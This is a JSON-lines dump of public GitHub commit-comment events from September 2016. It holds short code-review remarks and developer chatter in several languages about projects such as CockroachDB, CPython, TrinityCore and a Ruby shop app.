{"id":"4518021151","type":"CommitCommentEvent","actor":{"login":"thomas-mangin"},"repo":{"name":"yleteigner/exabgp"},"payload":{"comment":{"id":18903013,"position":null,"line":null,"path":null,"commit_id":"f395cdc1bf71c0c5166df1edc18c2b3d55680e15","created_at":"2016-09-05T18:39:21Z","updated_at":"2016-09-05T18:39:21Z","body":"Good continuation !"}},"created_at":"2016-09-05T18:39:21Z"}
{"id":"4518021772","type":"CommitCommentEvent","actor":{"login":"icomrade"},"repo":{"name":"EpochModTeam/DayZ-Epoch"},"payload":{"comment":{"id":18903017,"position":null,"line":null,"path":null,"commit_id":"d1d5fe54f3e0c9152ff77fb8f7ddbc5293f63519","created_at":"2016-09-05T18:39:38Z","updated_at":"2016-09-05T18:39:38Z","body":"Virtually every display needs an onKewDown EH prior to loading in, because of this I'll only leave the fix as is and present after loading in. I think the biggest problem command was endMission, on most servers I'm sure loading in with 5 fps would be excruciating and probably time out anyway, not to mention once in-game you can't unlimit your FPS so you are essentially unable to play."}},"created_at":"2016-09-05T18:39:38Z"}
{"id":"4518022818","type":"CommitCommentEvent","actor":{"login":"mucamaca"},"repo":{"name":"mucamaca/gravity_connect"},"payload":{"comment":{"id":18903020,"position":null,"line":null,"path":null,"commit_id":"1967f5ecd366cbef712541ff8e06bc178400ee19","created_at":"2016-09-05T18:40:06Z","updated_at":"2016-09-05T18:40:06Z","body":"saj mas zdaj release v0.1 v .zip in .msi izvedbi pod releases\n\n\nOn 05. 09. 2016 19:07, jakobzmrzlikar wrote:\n>\n> oki supr da si to naredu\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub \n> <https://github.com/mucamaca/gravity_connect/commit/1967f5ecd366cbef712541ff8e06bc178400ee19#commitcomment-18902434>, \n> or mute the thread \n> <https://github.com/notifications/unsubscribe-auth/AO7w9TXxw1ssK3g32MABA9jz-N69rqjgks5qnExggaJpZM4J1OYC>.\n>\n\n"}},"created_at":"2016-09-05T18:40:06Z"}
{"id":"4518026962","type":"CommitCommentEvent","actor":{"login":"lmmx"},"repo":{"name":"lmmx/shots"},"payload":{"comment":{"id":18903024,"position":null,"line":null,"path":null,"commit_id":"ea22a9ae7cf738b433e728a3497435562dda56c1","created_at":"2016-09-05T18:41:54Z","updated_at":"2016-09-05T18:41:54Z","body":"via https://schneider.ncifcrf.gov/images/boltzmann/boltzmann-tomb-4.html\r\nvia https://schneider.ncifcrf.gov/images/boltzmann/index.html\r\nvia https://schneider.ncifcrf.gov/boltzmann.html\r\ncitation: \"Photograph by Thomas Schneider, 2002, https://schneider.ncifcrf.gov/boltzmann.html\""}},"created_at":"2016-09-05T18:41:54Z"}
{"id":"4518028933","type":"CommitCommentEvent","actor":{"login":"atutor"},"repo":{"name":"atutor/pdf_converter"},"payload":{"comment":{"id":18903031,"position":1,"line":2,"path":"pdf_converter.php","commit_id":"66c09cef6894e7be29d16a0f52d82bb22566892d","created_at":"2016-09-05T18:42:47Z","updated_at":"2016-09-05T18:42:47Z","body":"This should probably be a relative path to the include directory, \"../../\""}},"created_at":"2016-09-05T18:42:47Z"}
{"id":"4518028987","type":"CommitCommentEvent","actor":{"login":"zverok"},"repo":{"name":"devico/learning-ruby"},"payload":{"comment":{"id":18903033,"position":20,"line":10,"path":"filter_genre.rb","commit_id":"891f104336eceb446fd374eb48f8d0e8d1daa58a","created_at":"2016-09-05T18:42:48Z","updated_at":"2016-09-05T18:42:48Z","body":"Чо б он его сам из конструктора не вызывал? Вместо того чтобы коллекция вызывала."}},"created_at":"2016-09-05T18:42:48Z"}
{"id":"4518029972","type":"CommitCommentEvent","actor":{"login":"sergeyklay"},"repo":{"name":"phalconslayer/framework"},"payload":{"comment":{"id":18903036,"position":7,"line":55,"path":"src/Clarity/Console/Script/RunCommand.php","commit_id":"f15d73f9687ef877573cdfdba5a2df6c8dd433b3","created_at":"2016-09-05T18:43:16Z","updated_at":"2016-09-05T18:43:16Z","body":"bash?"}},"created_at":"2016-09-05T18:43:16Z"}
{"id":"4518032507","type":"CommitCommentEvent","actor":{"login":"BramGruneir"},"repo":{"name":"eisenstatdavid/cockroach"},"payload":{"comment":{"id":18903039,"position":89,"line":1805,"path":"storage/replica_command.go","commit_id":"2107aff38e2411726c7f6262242800fccea43bb1","created_at":"2016-09-05T18:44:26Z","updated_at":"2016-09-05T18:44:26Z","body":"Again, you need to return to stop further processing."}},"created_at":"2016-09-05T18:44:26Z"}
{"id":"4518034605","type":"CommitCommentEvent","actor":{"login":"jackpoz"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":18903042,"position":null,"line":null,"path":null,"commit_id":"805637cea15470dac4b9417494e4d89f1c1d3239","created_at":"2016-09-05T18:45:21Z","updated_at":"2016-09-05T18:45:21Z","body":"what does 8 mean ?"}},"created_at":"2016-09-05T18:45:21Z"}
{"id":"4518035242","type":"CommitCommentEvent","actor":{"login":"olleharstedt"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":18903043,"position":5,"line":691,"path":"application/helpers/replacements_helper.php","commit_id":"b1c10d5d9f5f4f0e482c071bce787aee3864bdad","created_at":"2016-09-05T18:45:40Z","updated_at":"2016-09-05T18:45:40Z","body":"This version is no longer feature frozen. Still, the HTML should be stable, yes.\r\n\r\nI did this change since the warning always was showed for a fraction of a second, on each page reload in front-end. I was hoping no one made a custom styling of this... We can discuss it further at the meeting tomorrow if you want to."}},"created_at":"2016-09-05T18:45:40Z"}
{"id":"4518039972","type":"CommitCommentEvent","actor":{"login":"BobS33"},"repo":{"name":"BobS33/theCanyon"},"payload":{"comment":{"id":18903051,"position":null,"line":null,"path":null,"commit_id":"7c2336c524a6de06d600e7f8a05632e454dd303d","created_at":"2016-09-05T18:47:53Z","updated_at":"2016-09-05T18:47:53Z","body":"wdwd"}},"created_at":"2016-09-05T18:47:53Z"}
{"id":"4518042510","type":"CommitCommentEvent","actor":{"login":"the-varlog"},"repo":{"name":"istaricomics/shop"},"payload":{"comment":{"id":18903057,"position":4,"line":6,"path":"app/controllers/application_controller.rb","commit_id":"6a3fd101cd77165b57021018ea87bc56d8c3e456","created_at":"2016-09-05T18:49:01Z","updated_at":"2016-09-05T18:49:01Z","body":"а тут скобки точно нужны?"}},"created_at":"2016-09-05T18:49:01Z"}
{"id":"4518043907","type":"CommitCommentEvent","actor":{"login":"atutor"},"repo":{"name":"atutor/pdf_converter"},"payload":{"comment":{"id":18903059,"position":13,"line":9,"path":"side_menu.inc.php","commit_id":"66c09cef6894e7be29d16a0f52d82bb22566892d","created_at":"2016-09-05T18:49:40Z","updated_at":"2016-09-05T18:49:40Z","body":"You can also use a TRUE switch to pull a single row, like queryDB($query, $params, true), instead of getting array[0] see the details on the queryDB() function at: \r\nhttp://help.atutor.ca/developer/guidelines.html#querydb"}},"created_at":"2016-09-05T18:49:40Z"}
{"id":"4518044795","type":"CommitCommentEvent","actor":{"login":"the-varlog"},"repo":{"name":"istaricomics/shop"},"payload":{"comment":{"id":18903061,"position":4,"line":15,"path":"app/views/layouts/_footer.html.slim","commit_id":"6a3fd101cd77165b57021018ea87bc56d8c3e456","created_at":"2016-09-05T18:50:05Z","updated_at":"2016-09-05T18:50:05Z","body":"это нужно убрать)"}},"created_at":"2016-09-05T18:50:05Z"}
{"id":"4518044883","type":"CommitCommentEvent","actor":{"login":"mohierf"},"repo":{"name":"Alignak-monitoring-contrib/alignak-backend"},"payload":{"comment":{"id":18903062,"position":null,"line":null,"path":null,"commit_id":"87410088b9ca5128d8dc4f794d39019d58249f91","created_at":"2016-09-05T18:50:07Z","updated_at":"2016-09-05T18:50:07Z","body":"Should we make a version for this fix?"}},"created_at":"2016-09-05T18:50:07Z"}
{"id":"4518045121","type":"CommitCommentEvent","actor":{"login":"the-varlog"},"repo":{"name":"istaricomics/shop"},"payload":{"comment":{"id":18903064,"position":1,"line":12,"path":"app/views/layouts/_footer.html.slim","commit_id":"6a3fd101cd77165b57021018ea87bc56d8c3e456","created_at":"2016-09-05T18:50:14Z","updated_at":"2016-09-05T18:50:14Z","body":"и кинуть серии в этот массив"}},"created_at":"2016-09-05T18:50:14Z"}
{"id":"4518047657","type":"CommitCommentEvent","actor":{"login":"ralmarri12"},"repo":{"name":"ralmarri12/SmartCMS"},"payload":{"comment":{"id":18903067,"position":3,"line":3,"path":"css/fontello.css","commit_id":"9cbd15edf64a51be86726b52ec9b330b6aa3710e","created_at":"2016-09-05T18:51:18Z","updated_at":"2016-09-05T18:51:18Z","body":"Hay, what are you doing here?"}},"created_at":"2016-09-05T18:51:18Z"}
{"id":"4518047737","type":"CommitCommentEvent","actor":{"login":"atjonathan"},"repo":{"name":"Musare/MusareNode"},"payload":{"comment":{"id":18903068,"position":4,"line":4,"path":"src/logic/stations.js","commit_id":"e5b0c181da7d2da8775f5ad278f20a361f80e170","created_at":"2016-09-05T18:51:20Z","updated_at":"2016-09-05T18:51:20Z","body":"const?"}},"created_at":"2016-09-05T18:51:20Z"}
{"id":"4518048841","type":"CommitCommentEvent","actor":{"login":"BramGruneir"},"repo":{"name":"eisenstatdavid/cockroach"},"payload":{"comment":{"id":18903070,"position":108,"line":1824,"path":"storage/replica_command.go","commit_id":"2107aff38e2411726c7f6262242800fccea43bb1","created_at":"2016-09-05T18:51:51Z","updated_at":"2016-09-05T18:51:51Z","body":"Why would startkey be less than localmax?"}},"created_at":"2016-09-05T18:51:51Z"}
{"id":"4518049776","type":"CommitCommentEvent","actor":{"login":"BramGruneir"},"repo":{"name":"eisenstatdavid/cockroach"},"payload":{"comment":{"id":18903075,"position":112,"line":1828,"path":"storage/replica_command.go","commit_id":"2107aff38e2411726c7f6262242800fccea43bb1","created_at":"2016-09-05T18:52:17Z","updated_at":"2016-09-05T18:52:17Z","body":"must return here too."}},"created_at":"2016-09-05T18:52:17Z"}
{"id":"4518050023","type":"CommitCommentEvent","actor":{"login":"zackhall"},"repo":{"name":"lodash/lodash.github.io"},"payload":{"comment":{"id":18903076,"position":null,"line":null,"path":null,"commit_id":"aa9141462e303efd8fafd88f2de436e2b1844f69","created_at":"2016-09-05T18:52:24Z","updated_at":"2016-09-05T18:52:24Z","body":"Ahh, that's right. I recall now. "}},"created_at":"2016-09-05T18:52:24Z"}
{"id":"4518050475","type":"CommitCommentEvent","actor":{"login":"atutor"},"repo":{"name":"atutor/pdf_converter"},"payload":{"comment":{"id":18903078,"position":null,"line":null,"path":null,"commit_id":"66c09cef6894e7be29d16a0f52d82bb22566892d","created_at":"2016-09-05T18:52:36Z","updated_at":"2016-09-05T18:52:36Z","body":"When I test this I only seem to get the page's URL as the content of the file.\r\n<img width=\"1197\" alt=\"pdf_output\" src=\"https://cloud.githubusercontent.com/assets/624054/18255503/5533260a-7378-11e6-964f-e74ff51f27ca.png\">\r\n"}},"created_at":"2016-09-05T18:52:36Z"}
{"id":"4518050907","type":"CommitCommentEvent","actor":{"login":"dothework"},"repo":{"name":"dhelmick103/the_pantry"},"payload":{"comment":{"id":18903079,"position":null,"line":null,"path":null,"commit_id":"acd3fe416337848a2c1072931f2e8279e6d622f6","created_at":"2016-09-05T18:52:47Z","updated_at":"2016-09-05T18:52:47Z","body":"@dhelmick103 Everything looks good here Dan. Press ahead."}},"created_at":"2016-09-05T18:52:47Z"}
{"id":"4518053748","type":"CommitCommentEvent","actor":{"login":"Weslleysfc"},"repo":{"name":"Pronatec-Unit/Ajuda-Eu"},"payload":{"comment":{"id":18903083,"position":2,"line":2,"path":"README.md","commit_id":"ee9e5ed1f81f1bf462018c177a50a847e9f54aea","created_at":"2016-09-05T18:54:06Z","updated_at":"2016-09-05T18:54:06Z","body":"Aplicativo criado com a finalidade de auxiliar pessoas que necessitam de serviços para a contribuição de atividades que gereciam no seu dia a dia."}},"created_at":"2016-09-05T18:54:06Z"}
{"id":"4518053809","type":"CommitCommentEvent","actor":{"login":"ruslanshakirov"},"repo":{"name":"istaricomics/shop"},"payload":{"comment":{"id":18903084,"position":4,"line":6,"path":"app/controllers/application_controller.rb","commit_id":"6a3fd101cd77165b57021018ea87bc56d8c3e456","created_at":"2016-09-05T18:54:08Z","updated_at":"2016-09-05T18:54:08Z","body":"@the-varlog в ruby чем меньше скобок, тем лучше\r\nно тут они нужны"}},"created_at":"2016-09-05T18:54:08Z"}
{"id":"4518054398","type":"CommitCommentEvent","actor":{"login":"BramGruneir"},"repo":{"name":"eisenstatdavid/cockroach"},"payload":{"comment":{"id":18903085,"position":62,"line":1778,"path":"storage/replica_command.go","commit_id":"2107aff38e2411726c7f6262242800fccea43bb1","created_at":"2016-09-05T18:54:23Z","updated_at":"2016-09-05T18:54:23Z","body":"I'm not sure I like how you do everything in this single command.  Wouldn't it be easier to track  if this only fired off the getChecksum request and then reported that to another system?\r\n\r\nMaybe I'm overthinking it."}},"created_at":"2016-09-05T18:54:23Z"}
{"id":"4518054951","type":"CommitCommentEvent","actor":{"login":"Micheus"},"repo":{"name":"DavidBluecame/wings"},"payload":{"comment":{"id":18903086,"position":null,"line":null,"path":null,"commit_id":"5e0f82dc673ee37ee0aeea5c2b38c87967f14754","created_at":"2016-09-05T18:54:38Z","updated_at":"2016-09-05T18:54:38Z","body":"David, do you have any other commit pending to be upload?\r\nI found the Yafaray plugin isn't in a good standard related to field names. Some controls doesn't get an key (ID) and that is not good. I'm working on fix the conflicts problem and I would like to fix that too, so I would like to work in something that will not cause code conflicts. :-)\r\n\r\nDialog results contains:\r\n       [**0.0**, **1.0**,\r\n        :\r\n        {yafaray,enabled,2},\r\n        **result**, **diffusetexture**, **true**,\r\n        {yafaray,type,2},\r\n        {yafaray,oren_nayar_sigma},\r\n        {yafaray,blend_mat1},\r\n        **off**,\r\n        {yafaray,enabled,4},\r\n "}},"created_at":"2016-09-05T18:54:38Z"}
{"id":"4518055214","type":"CommitCommentEvent","actor":{"login":"BramGruneir"},"repo":{"name":"eisenstatdavid/cockroach"},"payload":{"comment":{"id":18903087,"position":62,"line":1778,"path":"storage/replica_command.go","commit_id":"2107aff38e2411726c7f6262242800fccea43bb1","created_at":"2016-09-05T18:54:45Z","updated_at":"2016-09-05T18:54:45Z","body":"But I'm sure that breaking this up into smaller parts would at least make it much easier to test."}},"created_at":"2016-09-05T18:54:45Z"}
{"id":"4518057239","type":"CommitCommentEvent","actor":{"login":"ruslanshakirov"},"repo":{"name":"istaricomics/shop"},"payload":{"comment":{"id":18903092,"position":4,"line":15,"path":"app/views/layouts/_footer.html.slim","commit_id":"6a3fd101cd77165b57021018ea87bc56d8c3e456","created_at":"2016-09-05T18:55:40Z","updated_at":"2016-09-05T18:55:40Z","body":"это я для тебя оставил, чтобы ты сделал, как тебе надо:о"}},"created_at":"2016-09-05T18:55:40Z"}
{"id":"4518058671","type":"CommitCommentEvent","actor":{"login":"ruslanshakirov"},"repo":{"name":"istaricomics/shop"},"payload":{"comment":{"id":18903095,"position":1,"line":12,"path":"app/views/layouts/_footer.html.slim","commit_id":"6a3fd101cd77165b57021018ea87bc56d8c3e456","created_at":"2016-09-05T18:56:18Z","updated_at":"2016-09-05T18:56:18Z","body":"зачем? так код будет понятнее, лучше оставить второй итератор"}},"created_at":"2016-09-05T18:56:18Z"}
{"id":"4518058935","type":"CommitCommentEvent","actor":{"login":"BramGruneir"},"repo":{"name":"eisenstatdavid/cockroach"},"payload":{"comment":{"id":18903096,"position":9,"line":1743,"path":"storage/replica_command.go","commit_id":"2107aff38e2411726c7f6262242800fccea43bb1","created_at":"2016-09-05T18:56:25Z","updated_at":"2016-09-05T18:56:25Z","body":"You're going to want to figure out the context.  I'm not sure if there is one that could be added to checkconsistency, or not.  But I'm sure you'll want to add some tracing here."}},"created_at":"2016-09-05T18:56:25Z"}
{"id":"4518060304","type":"CommitCommentEvent","actor":{"login":"ddurieux"},"repo":{"name":"Alignak-monitoring-contrib/alignak-backend"},"payload":{"comment":{"id":18903100,"position":null,"line":null,"path":null,"commit_id":"87410088b9ca5128d8dc4f794d39019d58249f91","created_at":"2016-09-05T18:56:59Z","updated_at":"2016-09-05T18:56:59Z","body":"No, I'm working on fix for grafana graph when use graphite, so after that we will make a new version"}},"created_at":"2016-09-05T18:56:59Z"}
{"id":"4518061126","type":"CommitCommentEvent","actor":{"login":"BramGruneir"},"repo":{"name":"eisenstatdavid/cockroach"},"payload":{"comment":{"id":18903101,"position":15,"line":174,"path":"storage/replica_trigger.go","commit_id":"2107aff38e2411726c7f6262242800fccea43bb1","created_at":"2016-09-05T18:57:19Z","updated_at":"2016-09-05T18:57:19Z","body":"Unlocked or locked?  You're hitting r.mu.checksum, which implies locked."}},"created_at":"2016-09-05T18:57:19Z"}
{"id":"4518061142","type":"CommitCommentEvent","actor":{"login":"tchapi"},"repo":{"name":"tchapi/pianette"},"payload":{"comment":{"id":18903102,"position":null,"line":null,"path":null,"commit_id":"ae87fa6152d07f33e56044c4467ed8e9fafd2af6","created_at":"2016-09-05T18:57:20Z","updated_at":"2016-09-05T18:57:20Z","body":"C'est dans ces moments de génie que je te retrouve mon bon @coox "}},"created_at":"2016-09-05T18:57:20Z"}
{"id":"4518063345","type":"CommitCommentEvent","actor":{"login":"the-varlog"},"repo":{"name":"istaricomics/shop"},"payload":{"comment":{"id":18903107,"position":2,"line":13,"path":"app/views/layouts/_footer.html.slim","commit_id":"6a3fd101cd77165b57021018ea87bc56d8c3e456","created_at":"2016-09-05T18:58:17Z","updated_at":"2016-09-05T18:58:17Z","body":"тогда лучше этот блок заменить на \r\n```ruby\r\n- categories.each do |category|\r\n  li= link_to category.name, category\r\n```"}},"created_at":"2016-09-05T18:58:17Z"}
{"id":"4518063928","type":"CommitCommentEvent","actor":{"login":"sidey79"},"repo":{"name":"RFD-FHEM/RFFHEM"},"payload":{"comment":{"id":18903110,"position":215,"line":3419,"path":"FHEM/00_SIGNALduino.pm","commit_id":"b760d47fc6af076cef870413706636e5d63cc556","created_at":"2016-09-05T18:58:30Z","updated_at":"2016-09-05T18:58:30Z","body":"Tia, ich habe es nur am Rande verfolgt.\r\nDas Logische Modul kann zwei Wetterstationen prinzipiell.\r\n\r\nBei einer ist der CRC bekannt, bei der anderen nicht.\r\nIch nehme an, die wh1080, kann nur dann verarbeitet werden, wenn der CRC Check deaktiviert ist. Für die andere Station war es ohne Crc aber von Nachteil.\r\n\r\nAlso kann der Anwender das jetzt im Physichen Device abstellen, da es für das Logische Gerät derzeit keine Möglichkeit gibt."}},"created_at":"2016-09-05T18:58:30Z"}
{"id":"4518064471","type":"CommitCommentEvent","actor":{"login":"the-varlog"},"repo":{"name":"istaricomics/shop"},"payload":{"comment":{"id":18903112,"position":5,"line":16,"path":"app/views/layouts/_footer.html.slim","commit_id":"6a3fd101cd77165b57021018ea87bc56d8c3e456","created_at":"2016-09-05T18:58:44Z","updated_at":"2016-09-05T18:58:44Z","body":"А тут заменить на ссылку.\r\nВпрочем, я  потом сам могу это исправить"}},"created_at":"2016-09-05T18:58:44Z"}
{"id":"4518065221","type":"CommitCommentEvent","actor":{"login":"Demonid"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":18903117,"position":null,"line":null,"path":null,"commit_id":"805637cea15470dac4b9417494e4d89f1c1d3239","created_at":"2016-09-05T18:59:03Z","updated_at":"2016-09-05T18:59:03Z","body":"@jackpoz https://github.com/TrinityCore/TrinityCore/commit/10e0f4ff8faa007b4c0c247a9368a746da7b7b0c\r\n\r\nSomething about spell tolerance for spells while moving or something."}},"created_at":"2016-09-05T18:59:03Z"}
{"id":"4518065795","type":"CommitCommentEvent","actor":{"login":"jakobzmrzlikar"},"repo":{"name":"mucamaca/gravity_connect"},"payload":{"comment":{"id":18903121,"position":null,"line":null,"path":null,"commit_id":"1967f5ecd366cbef712541ff8e06bc178400ee19","created_at":"2016-09-05T18:59:18Z","updated_at":"2016-09-05T18:59:18Z","body":"ja sej sm vidu ja, nism vedu da lahko direkt na githubu release delas"}},"created_at":"2016-09-05T18:59:18Z"}
{"id":"4518067067","type":"CommitCommentEvent","actor":{"login":"Blaisorblade"},"repo":{"name":"farkam135/GoIV"},"payload":{"comment":{"id":18903132,"position":36,"line":71,"path":"app/src/main/java/com/kamron/pogoiv/MainActivity.java","commit_id":"2234723be4f73c2a5b459686169ae5a260871619","created_at":"2016-09-05T18:59:52Z","updated_at":"2016-09-05T18:59:52Z","body":"@nahojjjen What about this?\r\n\r\n> Would it be possible to avoid changes unrelated to the actual commit?"}},"created_at":"2016-09-05T18:59:52Z"}
{"id":"4518067150","type":"CommitCommentEvent","actor":{"login":"gasinvein"},"repo":{"name":"TelepathyQt/telepathy-morse"},"payload":{"comment":{"id":18903133,"position":null,"line":null,"path":null,"commit_id":"e7ebe32bb9e319d3f542fce756b43f45691218c1","created_at":"2016-09-05T18:59:55Z","updated_at":"2016-09-05T18:59:55Z","body":"Dependence on telepathy 0.9.8, srsly? Most distributions still don't ship 0.9.7, even bleeding-edge ones like archlinux."}},"created_at":"2016-09-05T18:59:55Z"}
{"id":"4518074650","type":"CommitCommentEvent","actor":{"login":"rtrangucci"},"repo":{"name":"stan-dev/math"},"payload":{"comment":{"id":18903142,"position":79,"line":102,"path":"stan/math/rev/mat/fun/cholesky_decompose.hpp","commit_id":"b8843cc848da384dcfac09154d2b3ac57fc727c6","created_at":"2016-09-05T19:03:05Z","updated_at":"2016-09-05T19:03:05Z","body":"Potentially costly"}},"created_at":"2016-09-05T19:03:05Z"}
{"id":"4518075554","type":"CommitCommentEvent","actor":{"login":"BramGruneir"},"repo":{"name":"eisenstatdavid/cockroach"},"payload":{"comment":{"id":18903143,"position":null,"line":null,"path":null,"commit_id":"2107aff38e2411726c7f6262242800fccea43bb1","created_at":"2016-09-05T19:03:29Z","updated_at":"2016-09-05T19:03:29Z","body":"Looking good.  Obviously, this is going to need tests.  A bunch of them."}},"created_at":"2016-09-05T19:03:29Z"}
{"id":"4518079575","type":"CommitCommentEvent","actor":{"login":"scoder"},"repo":{"name":"1st1/cpython"},"payload":{"comment":{"id":18903150,"position":68,"line":426,"path":"Objects/genobject.c","commit_id":"fa299fe668ba07141b1791f56b1a37efcaf86344","created_at":"2016-09-05T19:05:25Z","updated_at":"2016-09-05T19:05:25Z","body":"This is lacking a NULL as last argument. It only accidentally works if any of the arguments is NULL."}},"created_at":"2016-09-05T19:05:25Z"}
{"id":"4518082487","type":"CommitCommentEvent","actor":{"login":"Ohsepoa"},"repo":{"name":"XoopsX/d3pipes"},"payload":{"comment":{"id":18903161,"position":null,"line":null,"path":null,"commit_id":"d4cf6cd6a698d289c3d58a6c0e1e7d9e3c3654ba","created_at":"2016-09-05T19:06:46Z","updated_at":"2016-09-05T19:06:46Z","body":"Not work in XCL 2.2.\r\n\r\nSee at: http://aulasfrances.myht.org/modules/d3pipes/index.php?page=clipping&clipping_id=24\r\n\r\n\r\n "}},"created_at":"2016-09-05T19:06:46Z"}
{"id":"4518088343","type":"CommitCommentEvent","actor":{"login":"jbgi"},"repo":{"name":"scalaz/scalaz"},"payload":{"comment":{"id":18903176,"position":10,"line":10,"path":"base/src/main/scala/data/MaybeFunctions.scala","commit_id":"3a9b404d20c6e48f9a135616265789be8ddff5d0","created_at":"2016-09-05T19:09:16Z","updated_at":"2016-09-05T19:09:16Z","body":"Just wondering: is the reason we don't implement this as `_.fold(f, b)` for performance reason (strict evaluation)?"}},"created_at":"2016-09-05T19:09:16Z"}
{"id":"4518088326","type":"CommitCommentEvent","actor":{"login":"nahojjjen"},"repo":{"name":"farkam135/GoIV"},"payload":{"comment":{"id":18903177,"position":36,"line":71,"path":"app/src/main/java/com/kamron/pogoiv/MainActivity.java","commit_id":"2234723be4f73c2a5b459686169ae5a260871619","created_at":"2016-09-05T19:09:17Z","updated_at":"2016-09-05T19:09:17Z","body":"I did the auto reformat once in this commit & noticed that lots of these instance variables moved around, I tried to move them back but i guess one of them slipped through. I don't particularly care enough to fix it though."}},"created_at":"2016-09-05T19:09:17Z"}
{"id":"4518088449","type":"CommitCommentEvent","actor":{"login":"Frederikam"},"repo":{"name":"Frederikam/FredBoat"},"payload":{"comment":{"id":18903178,"position":null,"line":null,"path":null,"commit_id":"cc25d318487c9389f816ae423feefc9a2121a4d8","created_at":"2016-09-05T19:09:20Z","updated_at":"2016-09-05T19:09:20Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;wWR5K1UL&#x2F;28-fix-grafana-frederikam-com\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Fix grafana.frederikam.com</a>"}},"created_at":"2016-09-05T19:09:20Z"}
{"id":"4518088808","type":"CommitCommentEvent","actor":{"login":"Frederikam"},"repo":{"name":"Frederikam/FredBoat"},"payload":{"comment":{"id":18903181,"position":null,"line":null,"path":null,"commit_id":"a260ab8b980e6724860a243fcb1224f20575ec21","created_at":"2016-09-05T19:09:31Z","updated_at":"2016-09-05T19:09:31Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;wWR5K1UL&#x2F;28-fix-grafana-frederikam-com\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Fix grafana.frederikam.com</a>"}},"created_at":"2016-09-05T19:09:31Z"}
{"id":"4518088910","type":"CommitCommentEvent","actor":{"login":"NinaDigital"},"repo":{"name":"NinaDigital/NinaDigital"},"payload":{"comment":{"id":18903182,"position":null,"line":null,"path":null,"commit_id":"e15d46385f9c3b3b05dc7d2695a466f9a8854516","created_at":"2016-09-05T19:09:34Z","updated_at":"2016-09-05T19:09:34Z","body":"My first repository on GitHub."}},"created_at":"2016-09-05T19:09:34Z"}
{"id":"4518090464","type":"CommitCommentEvent","actor":{"login":"rosiel"},"repo":{"name":"agile-humanities/agile_partial_date"},"payload":{"comment":{"id":18903187,"position":33,"line":31,"path":"includes/partial_date.views.filter_handler_simple.inc","commit_id":"f6d51d56c7b32886736b83a0b2ba747dfb913b0e","created_at":"2016-09-05T19:10:14Z","updated_at":"2016-09-05T19:10:14Z","body":"Create a new widget, \"Partial Select\". It has to be used with Op Contains."}},"created_at":"2016-09-05T19:10:14Z"}
{"id":"4518091366","type":"CommitCommentEvent","actor":{"login":"pedrojsn96"},"repo":{"name":"pedrojsn96/atividade3DataVis"},"payload":{"comment":{"id":18903190,"position":null,"line":null,"path":null,"commit_id":"2952634d4fd24d8bf6f09d6dfe3496fc2f554664","created_at":"2016-09-05T19:10:38Z","updated_at":"2016-09-05T19:10:38Z","body":"#1 @pedrojsn96"}},"created_at":"2016-09-05T19:10:38Z"}
{"id":"4518093128","type":"CommitCommentEvent","actor":{"login":"1st1"},"repo":{"name":"1st1/cpython"},"payload":{"comment":{"id":18903194,"position":68,"line":426,"path":"Objects/genobject.c","commit_id":"fa299fe668ba07141b1791f56b1a37efcaf86344","created_at":"2016-09-05T19:11:08Z","updated_at":"2016-09-05T19:11:08Z","body":"wow, this is a good catch, thanks for that!"}},"created_at":"2016-09-05T19:11:08Z"}
{"id":"4518094173","type":"CommitCommentEvent","actor":{"login":"rosiel"},"repo":{"name":"agile-humanities/agile_partial_date"},"payload":{"comment":{"id":18903195,"position":4,"line":861,"path":"partial_date.module","commit_id":"f6d51d56c7b32886736b83a0b2ba747dfb913b0e","created_at":"2016-09-05T19:11:32Z","updated_at":"2016-09-05T19:11:32Z","body":"Creating a new element widget, using our custom element value callback, process function, and validate function (partial_date_select_validate thanks to Drupal naming magic.)"}},"created_at":"2016-09-05T19:11:32Z"}
{"id":"4518094980","type":"CommitCommentEvent","actor":{"login":"pedrojsn96"},"repo":{"name":"pedrojsn96/atividade3DataVis"},"payload":{"comment":{"id":18903196,"position":null,"line":null,"path":null,"commit_id":"2952634d4fd24d8bf6f09d6dfe3496fc2f554664","created_at":"2016-09-05T19:11:54Z","updated_at":"2016-09-05T19:11:54Z","body":"#2 @pedrojsn96"}},"created_at":"2016-09-05T19:11:54Z"}
{"id":"4518096580","type":"CommitCommentEvent","actor":{"login":"arthurbarros"},"repo":{"name":"rochacbruno/python-pagseguro"},"payload":{"comment":{"id":18903199,"position":null,"line":null,"path":null,"commit_id":"264cc7972d08b1339d09c3be8686850c0ff94eb1","created_at":"2016-09-05T19:12:29Z","updated_at":"2016-09-05T19:12:29Z","body":"Qual foi o motivo pelo disclaimer em relação ao MOIP e Pagseguro ter sido retirado ?"}},"created_at":"2016-09-05T19:12:29Z"}
{"id":"4518098817","type":"CommitCommentEvent","actor":{"login":"xpinjection"},"repo":{"name":"xpinjection/java8-misuses"},"payload":{"comment":{"id":18903207,"position":19,"line":17,"path":"src/com/xpinjection/java8/misused/lambda/AvoidLongLambdas.java","commit_id":"5370318d2c96e934a4b0346727417479a3af0a2a","created_at":"2016-09-05T19:13:26Z","updated_at":"2016-09-05T19:13:26Z","body":"Use import please."}},"created_at":"2016-09-05T19:13:26Z"}
{"id":"4518101605","type":"CommitCommentEvent","actor":{"login":"nilsding"},"repo":{"name":"thehowl/dynamic-e"},"payload":{"comment":{"id":18903214,"position":null,"line":null,"path":null,"commit_id":"1c35c0cfdc7ce73a23010a0637cc76e4bf6081b3","created_at":"2016-09-05T19:14:44Z","updated_at":"2016-09-05T19:14:44Z","body":"whaaat"}},"created_at":"2016-09-05T19:14:44Z"}
{"id":"4518101647","type":"CommitCommentEvent","actor":{"login":"blakeaholics"},"repo":{"name":"blakeaholics/parsedown"},"payload":{"comment":{"id":18903215,"position":null,"line":null,"path":null,"commit_id":"bad166e438d7ffbaaa31511bb951db283a5ca4dc","created_at":"2016-09-05T19:14:45Z","updated_at":"2016-09-05T19:14:45Z","body":"@user, image resize and inlineVideo\r\n\r\nFor FestiCal specifically."}},"created_at":"2016-09-05T19:14:45Z"}
